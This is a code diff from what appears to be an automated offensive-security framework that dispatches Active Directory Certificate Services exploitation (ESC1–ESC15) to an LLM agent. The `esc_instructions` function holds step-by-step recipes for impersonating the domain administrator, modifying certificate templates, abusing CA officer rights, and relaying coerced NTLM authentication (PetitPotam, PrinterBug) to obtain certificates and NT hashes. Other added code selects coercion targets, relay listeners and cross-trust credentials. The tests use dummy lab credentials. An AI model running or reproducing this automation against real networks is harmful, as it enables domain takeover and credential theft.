+ fn collect_falls_back_to_first_domain_when_no_host_match() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ // No matching host in state.hosts
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_certenroll_case_insensitive() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "certenroll"));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_multiple_adcs_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state.shares.push(make_share("192.168.58.51", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.51", "ca02.fabrikam.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_skips_cross_forest_cred_for_ca_host() {
+ // contoso.local CA, only fabrikam.local cred (different forest).
+ // certipy_find LDAP bind across forest trust fails 52e — skip dispatch.
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert!(
+ work.is_empty(),
+ "should not dispatch ADCS enum with cross-forest cred"
+ );
+ }
+
+ #[test]
+ fn collect_uses_child_domain_cred_for_parent_ca() {
+ // child cred → parent CA: same forest, LDAP bind succeeds.
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("dev.contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "childuser");
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_adcs_work(&state);
+ assert!(
+ work.is_empty(),
+ "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred"
+ );
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("dev.contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
#[test]
fn extract_domain_from_fqdn_typical() {
@@ -159,4 +628,70 @@ mod tests {
// "host." splits into ("host", "") -> Some("")
assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string()));
}
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers");
+ }
+
+ #[test]
+ fn certenroll_share_name_match() {
+ let share_name = "CertEnroll";
+ assert_eq!(share_name.to_lowercase(), "certenroll");
+ }
+
+ #[test]
+ fn certenroll_case_insensitive() {
+ let names = vec!["CertEnroll", "certenroll", "CERTENROLL"];
+ for name in names {
+ assert_eq!(name.to_lowercase(), "certenroll");
+ }
+ }
+
+ #[test]
+ fn domain_resolution_from_fqdn() {
+ // Verifies domain extraction works for typical ADCS hosts
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.contoso.local"),
+ Some("contoso.local".to_string())
+ );
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.fabrikam.local"),
+ Some("fabrikam.local".to_string())
+ );
+ }
+
+ #[test]
+ fn credential_selection_prefers_same_domain() {
+ let creds = [
+ ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ },
+ ares_core::models::Credential {
+ id: "c2".into(),
+ username: "admin2".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ },
+ ];
+ let target_domain = "fabrikam.local";
+ let selected = creds.iter().find(|c| {
+ !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase()
+ });
+ assert!(selected.is_some());
+ assert_eq!(selected.unwrap().domain, "fabrikam.local");
+ }
}
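
The forest-boundary cases above (child and sibling domains of one forest fall back fine; cross-forest credentials are rejected) reduce to a DNS-suffix comparison. A minimal sketch of that check, assuming forest membership is approximated by a shared root suffix (helper name hypothetical; real forests with multiple tree roots need trust data this heuristic cannot see):

```rust
/// Hypothetical helper: `dev.contoso.local` and `contoso.local` share the
/// root `contoso.local`, so a dev.contoso.local credential may bind to a
/// contoso.local CA; `fabrikam.local` does not share it, so dispatch is
/// skipped (the cross-forest LDAP bind would fail 52e).
fn same_forest(domain_a: &str, domain_b: &str) -> bool {
    let (a, b) = (domain_a.to_lowercase(), domain_b.to_lowercase());
    // Equal, or one is a dot-boundary child of the other.
    a == b || a.ends_with(&format!(".{b}")) || b.ends_with(&format!(".{a}"))
}

fn main() {
    assert!(same_forest("dev.contoso.local", "contoso.local")); // child to parent
    assert!(!same_forest("fabrikam.local", "contoso.local")); // cross-forest
}
```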
diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
index 124c9c2f..e65cbb07 100644
--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher;
const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
/// ADCS vulnerability types we know how to exploit.
-const EXPLOITABLE_ESC_TYPES: &[&str] = &[
+/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool)
+/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain)
+/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth)
+/// ESC8: NTLM relay to HTTP web enrollment (coercion role)
+/// ESC9/13: certipy req with specific flags
+/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy req -sid
+/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role)
+/// ESC15: Application policy OID abuse (certipy req -application-policies)
+pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[
"esc1",
+ "esc2",
+ "esc3",
"esc4",
+ "esc6",
+ "esc7",
"esc8",
+ "esc9",
+ "esc10",
+ "esc11",
+ "esc13",
+ "esc15",
"adcs_esc1",
+ "adcs_esc2",
+ "adcs_esc3",
"adcs_esc4",
+ "adcs_esc6",
+ "adcs_esc7",
"adcs_esc8",
+ "adcs_esc9",
+ "adcs_esc10",
+ "adcs_esc11",
+ "adcs_esc13",
+ "adcs_esc15",
];
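
Given the doubled `escN` / `adcs_escN` entries, the membership check the tests below exercise is presumably a flat, case-normalized lookup over this slice. A sketch, assuming it sits next to the const above (the real `is_exploitable_esc_type` is defined elsewhere in this file and may differ):

```rust
// Hypothetical reconstruction, assuming a simple case-insensitive contains.
fn is_exploitable_esc_type(esc_type: &str) -> bool {
    EXPLOITABLE_ESC_TYPES.contains(&esc_type.to_lowercase().as_str())
}
```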
/// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks.
-/// Interval: 30s.
+/// Interval: 5s.
pub async fn auto_adcs_exploitation(
dispatcher: Arc<Dispatcher>,
mut shutdown: watch::Receiver<bool>,
) {
- let mut interval = tokio::time::interval(Duration::from_secs(30));
+ let mut interval = tokio::time::interval(Duration::from_secs(5));
interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
loop {
@@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation(
.unwrap_or("")
.to_string();
- let ca_host = extract_ca_host(&vuln.details, &vuln.target);
+ let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| {
+ // When the parser couldn't determine the CA host (empty target),
+ // resolve it from the CertEnroll share for this domain.
+ resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain)
+ });
// For ESC4, we need the account with GenericAll on the template
let account_name = extract_account_name(&vuln.details);
// Find a credential for exploitation.
- // For ESC4, prefer the account that has GenericAll on the template.
- // For ESC1/ESC8, any authenticated user in the domain works.
- let credential = account_name
+ // For ESC4, prefer the account that has GenericAll on the
+ // template (it may live in a different domain than the CA
+ // — cross-forest ACL edge — so use the source-cred helper).
+ // For ESC1/ESC8/etc, any authenticated user in the CA's
+ // domain works; cross-forest ESC8 also accepts a credential
+ // from a trusting domain because the relay path doesn't
+ // need same-domain auth (the cert is issued to whatever
+ // principal lands on the relay).
+ let account_cred = account_name
.as_ref()
- .and_then(|acct| {
- state.credentials.iter().find(|c| {
- c.username.to_lowercase() == acct.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
+ .and_then(|acct| state.find_source_credential(acct, &domain));
+
+ let same_domain_cred = if !domain.is_empty() {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
})
- })
- .or_else(|| {
- // Fall back to any credential for this domain
- if !domain.is_empty() {
- state.credentials.iter().find(|c| {
- c.domain.to_lowercase() == domain.to_lowercase()
- && !c.password.is_empty()
- && !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- } else {
- state.credentials.iter().find(|c| {
- !c.password.is_empty()
- && !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- }
- })
- .cloned();
+ .cloned()
+ } else {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned()
+ };
+
+ let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() {
+ state.find_trust_credential(&domain)
+ } else {
+ None
+ };
+
+ let credential = account_cred.or(same_domain_cred).or(trust_cred);
if credential.is_none() {
- debug!(
+ info!(
vuln_id = %vuln.vuln_id,
esc_type = %esc_type,
"ADCS exploit skipped: no credential available"
@@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation(
.get(&domain.to_lowercase())
.cloned();
+ let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned();
+
+ // For coercion-based ESC paths (esc8/esc11), build a
+ // tier-ordered candidate list of coerce targets so the LLM
+ // agent can iterate when the first one's callback drifts.
+ let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") {
+ pick_coerce_targets(
+ ca_host.as_deref(),
+ dc_ip.as_deref(),
+ &state.domain_controllers,
+ &state.hosts,
+ )
+ } else {
+ Vec::new()
+ };
+
Some(AdcsExploitWork {
vuln_id: vuln.vuln_id.clone(),
dedup_key,
@@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation(
ca_host,
domain,
dc_ip,
+ domain_sid,
credential,
+ coerce_candidates,
})
})
.collect()
};
for item in work {
+ let role = role_for_esc_type(&item.esc_type);
+
+ // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and
+ // a coerce target that is not the CA itself — Windows NTLM
+ // same-machine loopback protection blocks relay back to the
+ // coerced host. Without these, the dispatched task cannot succeed.
+ let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" {
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => {
+ debug!(
+ vuln_id = %item.vuln_id,
+ esc_type = %item.esc_type,
+ "ADCS coercion exploit skipped: no listener_ip configured"
+ );
+ continue;
+ }
+ };
+ if item.coerce_candidates.is_empty() {
+ debug!(
+ vuln_id = %item.vuln_id,
+ esc_type = %item.esc_type,
+ ca_host = ?item.ca_host,
+ "ADCS coercion exploit skipped: no coerce target distinct from ca_host"
+ );
+ continue;
+ }
+ let primary = item.coerce_candidates[0].clone();
+ let all = item.coerce_candidates.clone();
+ (Some(primary), Some(all), Some(listener))
+ } else {
+ (None, None, None)
+ };
+
let mut payload = json!({
"technique": format!("adcs_{}", item.esc_type),
"vuln_type": format!("adcs_{}", item.esc_type),
@@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation(
"esc_type": item.esc_type,
"domain": item.domain,
"impersonate": "administrator",
+ "instructions": esc_instructions(&item.esc_type),
});
if let Some(ref ca) = item.ca_name {
@@ -192,6 +290,23 @@ pub async fn auto_adcs_exploitation(
if let Some(ref dc) = item.dc_ip {
payload["dc_ip"] = json!(dc);
}
+ if let Some(ref sid) = item.domain_sid {
+ payload["domain_sid"] = json!(sid);
+ // Administrator RID is always 500
+ payload["admin_sid"] = json!(format!("{sid}-500"));
+ }
+
+ if let Some(ref ip) = listener_ip {
+ payload["listener_ip"] = json!(ip);
+ }
+ if let Some(ref t) = coerce_target {
+ payload["coerce_target"] = json!(t);
+ }
+ if let Some(ref ts) = coerce_targets {
+ if !ts.is_empty() {
+ payload["coerce_targets"] = json!(ts);
+ }
+ }
if let Some(ref cred) = item.credential {
payload["username"] = json!(cred.username);
@@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation(
});
}
- // ESC8 uses coercion+relay, dispatch to coercion role.
- // ESC1/ESC4 use certipy directly, dispatch to privesc role.
- let role = role_for_esc_type(&item.esc_type);
-
let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type));
match dispatcher
.throttled_submit("exploit", role, payload, priority)
@@ -300,13 +411,190 @@ fn extract_account_name(
.map(|s| s.to_string())
}
+/// Resolve CA host IP from CertEnroll shares when the vuln has no target.
+/// Looks for a CertEnroll share whose host belongs to the given domain.
+/// Falls back to any CertEnroll share if no domain-matched share is found.
+fn resolve_ca_host_from_shares(
+ shares: &[ares_core::models::Share],
+ hosts: &[ares_core::models::Host],
+ domain: &str,
+) -> Option<String> {
+ let certenroll_shares: Vec<_> = shares
+ .iter()
+ .filter(|s| s.name.to_lowercase() == "certenroll")
+ .collect();
+
+ if certenroll_shares.is_empty() {
+ return None;
+ }
+
+ // Try domain-matched share first
+ if !domain.is_empty() {
+ let domain_lower = domain.to_lowercase();
+ if let Some(s) = certenroll_shares.iter().find(|s| {
+ hosts.iter().any(|h| {
+ (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase())
+ && h.hostname.to_lowercase().ends_with(&domain_lower)
+ })
+ }) {
+ return Some(s.host.clone());
+ }
+ }
+
+ // Fall back to any CertEnroll share (likely the CA for this environment)
+ certenroll_shares.first().map(|s| s.host.clone())
+}
+
+/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11,
+/// excluding the CA host (Windows NTLM same-machine loopback blocks relay
+/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) any other
+/// DCs in state, (3) Windows member servers in state. The agent iterates
+/// the list when an earlier candidate's callback drifts (a real lab
+/// failure mode — see `relay_and_coerce_validation.md`). Comparison against
+/// `ca_host` is case-insensitive.
+fn pick_coerce_targets(
+ ca_host: Option<&str>,
+ dc_ip: Option<&str>,
+ domain_controllers: &std::collections::HashMap<String, String>,
+ hosts: &[ares_core::models::Host],
+) -> Vec<String> {
+ let ca_lower = ca_host.map(str::to_lowercase);
+ let mut out: Vec<String> = Vec::new();
+ let push_unique = |out: &mut Vec<String>, candidate: &str| {
+ if candidate.is_empty() {
+ return;
+ }
+ let cand_lower = candidate.to_lowercase();
+ if ca_lower.as_deref() == Some(cand_lower.as_str()) {
+ return;
+ }
+ if !out.iter().any(|e| e.to_lowercase() == cand_lower) {
+ out.push(candidate.to_string());
+ }
+ };
+
+ // Tier 1: vuln-domain DC.
+ if let Some(dc) = dc_ip {
+ push_unique(&mut out, dc);
+ }
+ // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 —
+ // the CA accepts any authenticated machine account).
+ for ip in domain_controllers.values() {
+ push_unique(&mut out, ip);
+ }
+ // Tier 3: Windows member servers (bypass DC callback drift). We check
+ // both the OS string and SMB service exposure since `os` is not always
+ // populated.
+ for h in hosts {
+ if h.is_dc {
+ continue;
+ }
+ let is_windows = h.os.to_lowercase().contains("windows")
+ || h.services.iter().any(|s| {
+ let s = s.to_lowercase();
+ s.contains("microsoft-ds") || s.contains("netbios-ssn")
+ });
+ if is_windows {
+ push_unique(&mut out, &h.ip);
+ }
+ }
+
+ out
+}
+
/// Determine the dispatch role for a given ESC type.
-/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role).
+/// ESC8 and ESC11 use coercion+relay (coercion role); all others use certipy directly (privesc role).
fn role_for_esc_type(esc_type: &str) -> &'static str {
- if esc_type == "esc8" {
- "coercion"
- } else {
- "privesc"
+ match esc_type {
+ "esc8" | "esc11" => "coercion",
+ _ => "privesc",
+ }
+}
+
+/// Return ESC-type-specific exploitation instructions for the LLM agent.
+fn esc_instructions(esc_type: &str) -> &'static str {
+ match esc_type {
+ "esc1" => concat!(
+ "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n",
+ "Use certipy_request with template, ca (CA name), upn='administrator@',\n",
+ "dc_ip (domain controller), target (CA server IP from ca_host field),\n",
+ "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n",
+ "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+ "Then use certipy_auth with the resulting .pfx to get the NT hash."
+ ),
+ "esc2" => concat!(
+ "ESC2: Any Purpose EKU allows client auth.\n",
+ "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc3" => concat!(
+ "ESC3: Certificate Request Agent (enrollment agent).\n",
+ "Step 1: certipy_request the CRA template with target=ca_host.\n",
+ "Step 2: Use that cert to request a cert on behalf of administrator.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+ ),
+ "esc4" => concat!(
+ "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n",
+ "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n",
+ "requests a cert as administrator, then restores the original template.\n",
+ "IMPORTANT: Set target to the ca_host IP for certificate enrollment."
+ ),
+ "esc6" => concat!(
+ "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n",
+ "Use certipy_request with any template that allows client auth,\n",
+ "adding upn='administrator@', target=ca_host, and sid=admin_sid.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc7" => concat!(
+ "ESC7: ManageCA privilege abuse.\n",
+ "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n",
+ "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n",
+ "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n",
+ "The tool handles all 5 steps automatically and returns the NT hash."
+ ),
+ "esc9" => concat!(
+ "ESC9: GenericAll on a user allows UPN spoofing.\n",
+ "If you have GenericAll on a user, change their UPN to administrator@,\n",
+ "request a cert using the modified user, then restore the original UPN.\n",
+ "Use certipy_request (with target=ca_host) then certipy_auth.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+ ),
+ "esc10" => concat!(
+ "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n",
+ "The DC does not enforce strong cert-to-account binding.\n",
+ "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n",
+ "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc11" => concat!(
+ "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n",
+ "Use certipy_relay with target='rpc://' and ca=.\n",
+ "This starts a relay listener that accepts coerced NTLM auth and relays it\n",
+ "to the CA's RPC enrollment endpoint to obtain a certificate.\n",
+ "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n",
+ "After relay captures a cert, use certipy_auth with the .pfx."
+ ),
+ "esc13" => concat!(
+ "ESC13: Issuance Policy linked to a group.\n",
+ "Use certipy_request with the ESC13 template and target=ca_host.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc15" => concat!(
+ "ESC15 (CVE-2024-49019): Application policy OID abuse.\n",
+ "Use certipy_request with template, ca, target=ca_host,\n",
+ "and application_policies= (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n",
+ "The application policy OID overrides the template's EKU restrictions.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.",
}
}
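
A small usage sketch, assuming it sits in this module's tests, showing how the two lookups compose for a coercion-path versus a direct-enrollment ESC type:

```rust
#[test]
fn esc11_routes_to_coercion_with_rpc_relay_instructions() {
    // ESC11 relays coerced NTLM auth over RPC, so it needs the coercion
    // worker, and its instructions point at certipy_relay.
    assert_eq!(role_for_esc_type("esc11"), "coercion");
    assert!(esc_instructions("esc11").contains("certipy_relay"));
    // ESC13 keeps the direct-enrollment privesc path via certipy_request.
    assert_eq!(role_for_esc_type("esc13"), "privesc");
    assert!(esc_instructions("esc13").contains("certipy_request"));
}
```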
@@ -319,7 +607,13 @@ struct AdcsExploitWork {
ca_host: Option<String>,
domain: String,
dc_ip: Option<String>,
+ domain_sid: Option<String>,
credential: Option<ares_core::models::Credential>,
+ /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for
+ /// non-coercion ESC types. The dispatcher passes the first as
+ /// `coerce_target` (legacy) and the full list as `coerce_targets` so the
+ /// agent can iterate when the first target's callback drifts.
+ coerce_candidates: Vec<String>,
}
#[cfg(test)]
@@ -353,11 +647,29 @@ mod tests {
#[test]
fn is_exploitable_esc_type_positive() {
assert!(is_exploitable_esc_type("esc1"));
+ assert!(is_exploitable_esc_type("esc2"));
+ assert!(is_exploitable_esc_type("esc3"));
assert!(is_exploitable_esc_type("esc4"));
+ assert!(is_exploitable_esc_type("esc6"));
+ assert!(is_exploitable_esc_type("esc7"));
assert!(is_exploitable_esc_type("esc8"));
+ assert!(is_exploitable_esc_type("esc9"));
+ assert!(is_exploitable_esc_type("esc10"));
+ assert!(is_exploitable_esc_type("esc11"));
+ assert!(is_exploitable_esc_type("esc13"));
+ assert!(is_exploitable_esc_type("esc15"));
assert!(is_exploitable_esc_type("adcs_esc1"));
+ assert!(is_exploitable_esc_type("adcs_esc2"));
+ assert!(is_exploitable_esc_type("adcs_esc3"));
assert!(is_exploitable_esc_type("adcs_esc4"));
+ assert!(is_exploitable_esc_type("adcs_esc6"));
+ assert!(is_exploitable_esc_type("adcs_esc7"));
assert!(is_exploitable_esc_type("adcs_esc8"));
+ assert!(is_exploitable_esc_type("adcs_esc9"));
+ assert!(is_exploitable_esc_type("adcs_esc10"));
+ assert!(is_exploitable_esc_type("adcs_esc11"));
+ assert!(is_exploitable_esc_type("adcs_esc13"));
+ assert!(is_exploitable_esc_type("adcs_esc15"));
}
#[test]
@@ -370,13 +682,13 @@ mod tests {
#[test]
fn is_exploitable_esc_type_negative() {
- assert!(!is_exploitable_esc_type("esc2"));
- assert!(!is_exploitable_esc_type("esc3"));
+ assert!(!is_exploitable_esc_type("esc5"));
+ assert!(!is_exploitable_esc_type("esc14"));
assert!(!is_exploitable_esc_type("rbcd"));
assert!(!is_exploitable_esc_type("shadow_credentials"));
assert!(!is_exploitable_esc_type("genericall"));
assert!(!is_exploitable_esc_type(""));
- assert!(!is_exploitable_esc_type("adcs_esc2"));
+ assert!(!is_exploitable_esc_type("adcs_esc5"));
}
// normalize_esc_type
@@ -709,6 +1021,11 @@ mod tests {
assert_eq!(role_for_esc_type("esc8"), "coercion");
}
+ #[test]
+ fn role_for_esc11_is_coercion() {
+ assert_eq!(role_for_esc_type("esc11"), "coercion");
+ }
+
#[test]
fn role_for_esc1_is_privesc() {
assert_eq!(role_for_esc_type("esc1"), "privesc");
@@ -719,6 +1036,16 @@ mod tests {
assert_eq!(role_for_esc_type("esc4"), "privesc");
}
+ #[test]
+ fn role_for_esc10_is_privesc() {
+ assert_eq!(role_for_esc_type("esc10"), "privesc");
+ }
+
+ #[test]
+ fn role_for_esc15_is_privesc() {
+ assert_eq!(role_for_esc_type("esc15"), "privesc");
+ }
+
#[test]
fn role_for_unknown_defaults_to_privesc() {
assert_eq!(role_for_esc_type("esc99"), "privesc");
@@ -830,4 +1157,130 @@ mod tests {
);
assert_eq!(extract_account_name(&details), None);
}
+
+ // pick_coerce_targets
+
+ fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: "Windows Server 2019".to_string(),
+ roles: Vec::new(),
+ services: vec!["microsoft-ds".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: "Windows Server 2019".to_string(),
+ roles: Vec::new(),
+ services: vec!["microsoft-ds".to_string()],
+ is_dc: true,
+ owned: false,
+ }
+ }
+
+ fn linux_host(ip: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: format!("linux-{ip}"),
+ os: "Ubuntu 22.04".to_string(),
+ roles: Vec::new(),
+ services: vec!["ssh".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn pick_coerce_targets_prefers_vuln_domain_dc() {
+ let dcs: HashMap<String, String> =
+ [("contoso.local".to_string(), "192.168.58.20".to_string())]
+ .into_iter()
+ .collect();
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]);
+ assert_eq!(out, vec!["192.168.58.20".to_string()]);
+ }
+
+ #[test]
+ fn pick_coerce_targets_excludes_ca_host() {
+ let dcs: HashMap<String, String> =
+ [("contoso.local".to_string(), "192.168.58.10".to_string())]
+ .into_iter()
+ .collect();
+ let out = pick_coerce_targets(
+ Some("192.168.58.10"),
+ Some("192.168.58.10"),
+ &dcs,
+ &[windows_host("192.168.58.10", "ca-and-dc")],
+ );
+ assert!(out.is_empty(), "CA host must not appear: {out:?}");
+ }
+
+ #[test]
+ fn pick_coerce_targets_falls_back_to_member_servers() {
+ let dcs: HashMap<String, String> =
+ [("contoso.local".to_string(), "192.168.58.10".to_string())]
+ .into_iter()
+ .collect();
+ let hosts = vec![
+ dc_host("192.168.58.10", "dc01"),
+ windows_host("192.168.58.51", "ws01"),
+ linux_host("192.168.58.99"),
+ ];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts);
+ // CA excluded; only Windows non-DC member server remains.
+ assert_eq!(out, vec!["192.168.58.51".to_string()]);
+ }
+
+ #[test]
